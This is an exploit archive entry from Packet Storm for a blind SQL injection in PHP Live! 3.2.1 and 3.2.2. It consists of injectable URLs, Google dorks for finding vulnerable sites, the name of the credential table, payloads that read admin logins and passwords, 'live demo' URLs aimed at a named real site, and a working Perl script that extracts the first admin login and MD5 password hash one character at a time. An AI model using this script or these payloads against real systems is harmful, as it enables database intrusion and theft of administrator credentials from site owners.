PHP Live! 3.2.2 Blind SQL Injection

2009-07-24T00:00:00
ID PACKETSTORM:79580
Type packetstorm
Reporter boom3rang
Modified 2009-07-24T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
#################################################################  
#################################################################  
################ Original discover author banner ################  
#################################################################  
#################################################################  
# PhpLive 3.2.1/2 (x) Blind SQL injection [_][-][X]  
# _ ___ _ ___ ___ ___ _____ __ ___ __ __ ___   
# | |/ / || |/ __|___ / __| _ \ __\ \ / / |_ ) \ / \/ _ \   
# | ' <| __ | (_ |___| (__| / _| \ \/\/ / / / () | () \_, /   
# |_|\_\_||_|\___| \___|_|_\___| \_/\_/ /___\__/ \__/ /_/   
#   
#   
# Red n'black i dress eagle on my chest.  
# It's good to be an ALBANIAN Keep my head up high for that flag i die.  
# Im proud to be an ALBANIAN  
# ###################################################################   
# Author : boom3rang   
# Contact : boom3rang[at]live.com   
# Greetz : H!tm@N - KHG - cHs  
#  
# R.I.P redc00de   
# -------------------------------------------------------------------   
#   
# Affected software description   
# Software : PhpLive   
# Vendor : http://www.phplivesupport.com   
# Price : Live Support Download Starts at $89.95   
# Version Vuln. : v3.2.1 & v3.2.2   
# -------------------------------------------------------------------   
#   
# [~] SQLi :   
#   
# http://www.TARGET.com/message_box.php?theme=&l=[USERNAME]&x=[SQLi]   
# http://www.TARGET.com/request.php?l=[USERNAME]&x=[SQLi]   
#   
#   
# [~]Google Dork :   
#   
# Powered by PHP Live! v3.2.1   
# Powered by PHP Live! v3.2.2   
# allinurl:"request.php" "deptid"   
#   
# -------------------------------------------------------------------   
#   
# [~] Table_NAME = chat_admin  
# [~] Column_NAME = login - password - email - userID - name   
# -------------------------------------------------------------------   
#   
# [~] Admin Path :   
#   
# http://www.TARGET.com/phplive   
# -------------------------------------------------------------------   
# [~] Live Demo:  
#   
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=1 --> True  
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=2 --> False  
#  
# -------------------------------------------------------------------  
#  
# [~] ASCII  
#  
# /**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>100  
#  
# -------------------------------------------------------------------  
#   
# [~] Live Demo ASCII  
#  
# True  
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>48   
#   
# False  
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>127   
#   
  
###########################  
###########################  
# Modified version banner #  
###########################  
###########################  
  
# Author: skys  
# Contact: skysbsb[at]gmail.com  
# This script uses the PhpLive Blind Sql Injection (found by boom3rang) to recover first user login and MD5 password!  
# The result of this script is like:  
# admin:890f37d479270aea39ae0e156bbd9001  
  
  
####################  
# EDIT THESE LINES #  
####################  
  
# Edit this address acording to the php live path  
$address = "http://www.site.com/phplive";  
  
###############################  
# DO NOT EDIT BELOW THIS LINE #  
###############################  
  
use IO::Socket::INET;  
use HTTP::Request;  
use LWP::UserAgent;  
  
@site = ($address."/request.php?l=agenciawiv&x=1/**/and/**/ascii%28substring%28%28select/**/concat%28login,0x3a,password%29/**/from/**/chat_admin/**/limit/**/1,1%29,", ",1%29%29=");  
  
$base64str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";  
  
  
$tudo = "";  
$foundcolon = 0;  
  
  
for($i=1;$i<=100;$i++) {  
$found = 0;  
  
if($foundcolon == 0) {  
for($x=32;$x<=127;$x++) {  
$url = $site[0].$i.$site[1].$x;  
print "Testing pass index $i: character ".chr($x)."($x)\n";  
$resp = query($url);  
if($resp =~ m/deptid/i) {  
print "Found i($i): ".chr($x)."($x)\n";  
$tudo .= chr($x);  
print "All: $tudo\n";  
$found = 1;  
if($x == 0x3a) {  
$foundcolon = 1;  
}  
last;  
}  
}  
} else {  
for($x=0;$x<length($base64str);$x++) {  
$url = $site[0].$i.$site[1].ord(substr($base64str, $x, 1));  
print "Testing pass index $i: character ".ord(substr($base64str, $x, 1))."(".substr($base64str, $x, 1).")\n";  
$resp = query($url);  
if($resp =~ m/deptid/i) {  
print "Found i($i): ".substr($base64str, $x, 1)."(".ord(substr($base64str, $x, 1)).")\n";  
$tudo .= substr($base64str, $x, 1);  
print "All: $tudo\n";  
$found = 1;  
last;  
}  
}  
}  
  
if($found == 0) {  
print "Not found char index $i! End of md5 hash? :-)\n";  
last;  
}  
}  
  
print "login:md5: $tudo\n";  
exit;  
  
sub query() {  
$link = $_[0];  
my $req = HTTP::Request->new( GET => $link );  
my $ua = LWP::UserAgent->new();  
my $response = $ua->request($req);  
return $response->content;  
}  
  
`